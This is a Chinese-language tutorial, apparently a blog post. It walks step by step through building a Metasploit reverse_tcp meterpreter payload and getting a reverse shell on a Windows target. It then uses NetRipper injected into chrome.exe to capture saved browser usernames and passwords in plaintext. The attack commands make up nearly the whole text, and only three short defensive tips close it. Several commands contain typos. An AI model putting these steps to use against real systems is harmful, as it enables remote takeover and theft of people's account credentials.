前言

本篇文章我将手把手教会各位Buffer如何使用Metasploit+NetRipper获取Chrome等浏览器内保存的帐号密码。

图片.png

需要工具:

Kali Linux&Metasploit

NetRipper

1.下载并且配置NetRipper

git clone https://github.com/NytroRST/NetRipper.git

图片.png

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

图片.png

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

图片.png

cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

图片.png

cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

图片.png

2.生成Windows的Payload用于建立于目标机器的连接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe

图片.png

3.启动Metasploit并且进行监听

msfconsole

图片.png

use exploit/multi/handler

图片.png

set payload windows/meterpreter/reverse_tcp

图片.png

set LHOST IP

图片.png

set LPORT 6666

图片.png

options

图片.png

exploit

图片.png

目标机运行Payload获取到反弹shell

图片.png

4.上传DLL和exe文件到目标机器的C:\Users\Administrator\AppData\Local\Temp目录下

Upload /root/Desjtop/NetRipper/x64/DLL.dll
Upload /root/Desjtop/NetRipper/x64/NetRipper.exe 

 图片.png

shell NetRipper.exe 

图片.png
运行NetRipper.exe

NetRipper.exew DLL.dlll TEMPp trued 4096 –s user,pass

图片.png

NetRipper.exe ConfiguredDLL.dll chrome.exe 

我注入到了是chrome浏览器的进程,你也可以注入到其他浏览器(火狐,QQ浏览器,360浏览器等等)的进程,这里以Chrom浏览器为主

图片.png

5.测试验证

图片.png
图片.png

打开那个刚刚下载的txt文件

图片.png

Ctir+F输入pwpw或者pwd、pass、password等关键词来搜索明文密码

图片.png

参考文章:Freebuf玩转metasploit系列(第八集)

如果获取失败帐号密码的话,可能是网站使用了Https协议,或者登陆时在本地就进行了帐号口令的一个加密混淆!(个人推断)

防范方法:

1.不要点击来历不明的文件

2.浏览器登录可以扫描就扫描登录

3.如果没有必要个人建议不要在浏览器保存自己的社交帐号密码

*本文作者:艾登——皮尔斯